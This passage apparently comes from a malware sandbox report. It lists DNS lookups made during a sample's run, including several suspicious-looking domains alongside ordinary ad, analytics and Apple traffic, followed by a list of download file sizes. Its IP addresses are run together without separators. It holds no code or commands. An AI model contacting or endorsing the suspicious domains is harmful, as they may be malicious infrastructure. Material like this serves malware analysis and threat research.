110.t.keepitpumpin.io
DNS Response
163.172.204.15
-
8.8.8.8:53crl.rootca1.amazontrust.comdns
DNS Request
crl.rootca1.amazontrust.com
DNS Response
52.222.137.752.222.137.3152.222.137.19252.222.137.161
-
8.8.8.8:53crl.sca1b.amazontrust.comdns
DNS Request
crl.sca1b.amazontrust.com
DNS Response
13.227.211.14813.227.211.22013.227.211.18513.227.211.126
-
8.8.8.8:53collect.installeranalytics.comdns
DNS Request
collect.installeranalytics.com
DNS Response
3.209.18.13.232.36.43
DNS Request
ampcid.google.com
DNS Response
142.250.179.174
-
8.8.8.8:53111.t.keepitpumpin.iodns
DNS Request
111.t.keepitpumpin.io
DNS Response
212.83.141.61
-
8.8.8.8:53lumtest.comdns
DNS Request
lumtest.com
DNS Response
3.94.72.893.94.40.55
-
8.8.8.8:53cl4.apple.comdns
DNS Request
cl4.apple.com
DNS Response
17.253.53.20117.253.53.206
-
8.8.8.8:53iphone-ld.apple.comdns
DNS Request
iphone-ld.apple.com
DNS Response
2.22.22.2092.22.22.211
DNS Request
api-edge.apps.apple.com
DNS Response
104.80.224.24
-
8.8.8.8:53lumtest.comdns
DNS Request
lumtest.com
DNS Response
3.94.40.553.94.72.89
-
8.8.8.8:53aax-us-east.amazon-adsystem.comdns
DNS Request
aax-us-east.amazon-adsystem.com
DNS Response
52.94.231.7
-
8.8.8.8:53combine.urbanairship.comdns
DNS Request
combine.urbanairship.com
DNS Response
35.190.53.75
-
8.8.8.8:53saa.cbsi.comdns
DNS Request
saa.cbsi.com
DNS Response
13.36.218.17715.236.176.21015.188.95.229
-
8.8.8.8:53firebaselogging-pa.googleapis.comdns
DNS Request
firebaselogging-pa.googleapis.com
DNS Response
142.251.36.42
-
8.8.8.8:53lumtest.comdns
DNS Request
lumtest.com
DNS Response
3.94.72.893.94.40.55
-
8.8.8.8:53tags.tiqcdn.comdns
DNS Request
tags.tiqcdn.com
DNS Response
104.80.228.241
-
8.8.8.8:53doppler-config.cbsivideo.comdns
DNS Request
doppler-config.cbsivideo.com
DNS Response
151.101.37.188
-
8.8.8.8:53aax-us-east.amazon-adsystem.comdns
DNS Request
aax-us-east.amazon-adsystem.com
DNS Response
52.46.155.118
-
8.8.8.8:53config.claspws.tvdns
DNS Request
config.claspws.tv
DNS Response
3.18.68.1823.130.47.6918.190.78.55
-
8.8.8.8:53sdf-api.cbssports.clouddns
DNS Request
sdf-api.cbssports.cloud
DNS Response
52.222.139.6652.222.139.6752.222.139.5552.222.139.11
-
8.8.8.8:53int.akisinn.infodns
DNS Request
int.akisinn.info
DNS Response
34.95.120.195
-
8.8.8.8:53video-api.cbssports.comdns
DNS Request
video-api.cbssports.com
DNS Response
13.227.222.11513.227.222.10513.227.222.1113.227.222.85
-
8.8.8.8:53zned65ynwxvsuk9lf-cbs.siteintercept.qualtrics.comdns
DNS Request
zned65ynwxvsuk9lf-cbs.siteintercept.qualtrics.com
DNS Response
104.17.208.240104.17.209.240
-
8.8.8.8:53remote-data.urbanairship.comdns
DNS Request
remote-data.urbanairship.com
DNS Response
35.201.74.116
DNS Request
xp.apple.com
DNS Response
104.123.41.212
-
8.8.8.8:53sp.auth.adobe.comdns
DNS Request
sp.auth.adobe.com
DNS Response
34.209.227.16744.224.76.13934.217.172.4044.233.218.21644.240.219.20935.163.10.9335.167.202.18135.160.230.221
-
8.8.8.8:53lumtest.comdns
DNS Request
lumtest.com
DNS Response
3.94.40.553.94.72.89
-
8.8.8.8:53aax-us-east.amazon-adsystem.comdns
DNS Request
aax-us-east.amazon-adsystem.com
DNS Response
209.54.178.200
-
8.8.8.8:53www.cbssports.comdns
DNS Request
www.cbssports.com
DNS Response
151.101.37.188
-
8.8.8.8:53bakery.cbsi.videodns
DNS Request
bakery.cbsi.video
DNS Response
199.232.37.188
-
8.8.8.8:53438b44e68a18a815aaf4aa6ab.litix.iodns
DNS Request
438b44e68a18a815aaf4aa6ab.litix.io
DNS Response
3.225.211.883.209.245.14034.202.87.22335.168.81.8752.202.125.303.214.248.99
-
8.8.8.8:53sportshub.cbsistatic.comdns
DNS Request
sportshub.cbsistatic.com
DNS Response
151.101.37.188
-
8.8.8.8:53searchengineads.netdns
DNS Request
searchengineads.net
DNS Response
103.63.108.18
-
8.8.8.8:53searchengineads.netdns
DNS Request
searchengineads.net
DNS Response
103.63.108.18
DNS Request
a.adtng.com
DNS Response
216.18.168.166
-
8.8.8.8:53accounts.google.comdns
DNS Request
accounts.google.com
DNS Response
172.217.168.237
-
8.8.8.8:53update.googleapis.comdns
DNS Request
update.googleapis.com
DNS Response
142.250.179.195
DNS Request
ncsa.sdapi.io
DNS Response
104.73.134.42
-
8.8.8.8:53translate.googleapis.comdns
DNS Request
translate.googleapis.com
DNS Response
142.250.179.138
-
8.8.8.8:53accounts.google.comdns
DNS Request
accounts.google.com
DNS Response
172.217.168.237
-
8.8.8.8:53example.orgdns
DNS Request
example.org
DNS Response
93.184.216.34
DNS Request
match.sharethrough.com
DNS Response
18.184.122.7154.93.151.6935.158.223.213.126.175.244
-
8.8.8.8:53438b44e68a18a815aaf4aa6ab.litix.iodns
DNS Request
438b44e68a18a815aaf4aa6ab.litix.io
DNS Response
3.225.211.883.209.245.14034.202.87.22335.168.81.8752.202.125.303.214.248.99
-
8.8.8.8:53clients3.google.comdns
DNS Request
clients3.google.com
DNS Response
142.250.179.174
-
8.8.8.8:53sb.scorecardresearch.comdns
DNS Request
sb.scorecardresearch.com
DNS Response
52.222.139.9052.222.139.7752.222.139.2352.222.139.45
-
8.8.8.8:53inappcheck.itunes.apple.comdns
DNS Request
inappcheck.itunes.apple.com
DNS Response
96.16.53.20396.16.53.206
-
8.8.8.8:53errors.imrworldwide.comdns
DNS Request
errors.imrworldwide.com
DNS Response
100.20.12.3052.13.245.4952.26.115.248
-
8.8.8.8:53imasdk.googleapis.comdns
DNS Request
imasdk.googleapis.com
DNS Response
142.250.179.202
-
8.8.8.8:53438b44e68a18a815aaf4aa6ab.litix.iodns
DNS Request
438b44e68a18a815aaf4aa6ab.litix.io
DNS Response
35.168.81.8752.202.125.303.225.211.883.214.248.993.209.245.14034.202.87.223
-
8.8.8.8:53api2.branch.iodns
DNS Request
api2.branch.io
DNS Response
13.227.222.10313.227.222.11113.227.222.4413.227.222.30
-
8.8.8.8:53sp.auth.adobe.comdns
DNS Request
sp.auth.adobe.com
DNS Response
44.240.219.20935.160.230.22134.209.227.16734.217.172.4035.163.10.9334.223.151.15844.241.81.18734.218.159.207
-
8.8.8.8:53doppler-error.cbsivideo.comdns
DNS Request
doppler-error.cbsivideo.com
DNS Response
151.101.37.188
-
8.8.8.8:53aax-us-east.amazon-adsystem.comdns
DNS Request
aax-us-east.amazon-adsystem.com
DNS Response
209.54.176.34
-
8.8.8.8:53438b44e68a18a815aaf4aa6ab.litix.iodns
DNS Request
438b44e68a18a815aaf4aa6ab.litix.io
DNS Response
35.168.81.873.214.248.993.225.211.8852.202.125.3034.202.87.2233.209.245.140
-
8.8.8.8:53example.orgdns
DNS Request
example.org
DNS Response
93.184.216.34
DNS Request
top.searchinfonow.com
DNS Response
51.91.200.241
-
8.8.8.8:53pubads.g.doubleclick.netdns
DNS Request
pubads.g.doubleclick.net
DNS Response
216.58.208.98
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
-
Filesize
29.7MB
-
Filesize
29.7MB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
84KB
-
Filesize
8KB
-
Filesize
3.0MB
-
Filesize
4KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
1.5MB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
152KB
-
Filesize
100KB
-
Filesize
1.5MB
-
Filesize
572KB
-
Filesize
572KB
-
Filesize
7.4MB
-
Filesize
128KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
204KB
-
Filesize
1.8MB
-
Filesize
36KB
-
Filesize
29.3MB
-
Filesize
288KB
-
Filesize
29.4MB
-
Filesize
436KB
-
Filesize
12.3MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
92KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
88KB
-
Filesize
188KB
-
Filesize
29.4MB
-
Filesize
3.0MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
124KB
-
Filesize
29.4MB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
192KB
-
Filesize
112KB
-
Filesize
116KB
-
Filesize
29.4MB
-
Filesize
8KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
80KB
-
Filesize
268KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
348KB
-
Filesize
80KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
8KB
-
Filesize
29.3MB
-
Filesize
29.3MB
-
Filesize
29.3MB